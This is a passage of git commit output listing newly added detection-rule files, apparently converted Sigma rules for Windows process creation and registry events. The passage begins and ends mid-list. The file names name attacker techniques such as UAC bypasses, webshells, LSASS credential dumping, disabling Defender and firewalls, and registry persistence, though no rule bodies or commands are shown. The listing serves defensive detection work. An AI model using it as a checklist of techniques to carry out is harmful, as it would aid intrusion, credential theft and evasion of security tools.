tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tscon_localsystem.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_trustedpath.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_wsreset.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ultravnc_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vaultcmd_list_creds.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_verclsid_runs_com.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_virtualbox_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_tunnel_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vscode_tunnel_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_w32tm.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_chopper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_hacking.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_all_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_output.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_winzip_password_compression.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_namespace_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_process_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_computersystem.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_group.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_product.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_wusa_susp_parent_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_malware_netwire.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_malware_ursnif.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_persistence_amsi_providers.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_persistence_com_key_linking.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_add_local_hidden_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_apt_leviathan.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_apt_oceanlotus_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_apt_pandemic.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_bypass_via_wsreset.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_cmstp_execution_by_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_hack_wce_reg.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_mal_azorult.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_mal_flowcloud.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_malware_qakbot_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_mimikatz_printernightmare.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_modify_screensaver_binary_path.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_narrator_feedback_persistance.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_net_ntlm_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_office_test_regadd.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_office_trust_record_modification.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_persistence_recycle_bin.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_portproxy_registry_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_redmimicry_winnti_reg.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_runkey_winekey.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_runonce_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_shell_open_keys_manipulation.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_silentprocessexit_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_ssp_added_lsa_config.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_stickykey_like_backdoor.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_susp_atbroker_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_susp_download_run_key.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_susp_lsass_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_event_susp_mic_cam_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_event/registry_set_enable_anonymous_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_add_port_monitor.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_aedebug_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_amsi_com_hijack.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bginfo_custom_db.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bginfo_custom_vbscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_blackbyte_ransomware.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_change_rdp_port.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_change_security_zones.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_change_winevt_channelaccess.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_chrome_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_clickonce_trust_prompt.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_cobaltstrike_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_comhijack_sdclt.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_crashdump_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_creation_service_susp_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_creation_service_uncommon_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_defender_exclusions.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_desktop_background_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dhcp_calloutdll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_administrative_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_autologger_sessions.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_defender_firewall.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_function_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_macroruntimescanscope.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_privacy_settings_experience.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_security_center_notifications.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_system_restore.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_uac_registry.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_windows_defender_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_windows_firewall.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disable_winevt_logging.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disallowrun_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dns_over_https_enabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_dot_net_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_enabling_turnoffcheck.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_evtx_file_key_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_fax_change_service_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_fax_dll_persistance.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_file_association_exefile.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hangs_debugger_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hhctrl_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hidden_extention.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hide_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hide_function_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_mal_adwind.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_new_application_appcompat.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_new_network_provider.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_enable_dde.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_outlook_security_settings.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_trust_record_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_trusted_location_uncommon.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_office_vba_warnings_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_app_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_appx_debugger.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_autodial_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_chm.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_globalflags.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_ie.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_ifilter.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_lsa_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_mpnotify.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_mycomputer.yml create mode 100644 tools/sigmac/converted_rules/builtin/registry/registry_set/registry_set_persistence_natural_language.yml create mode 100644 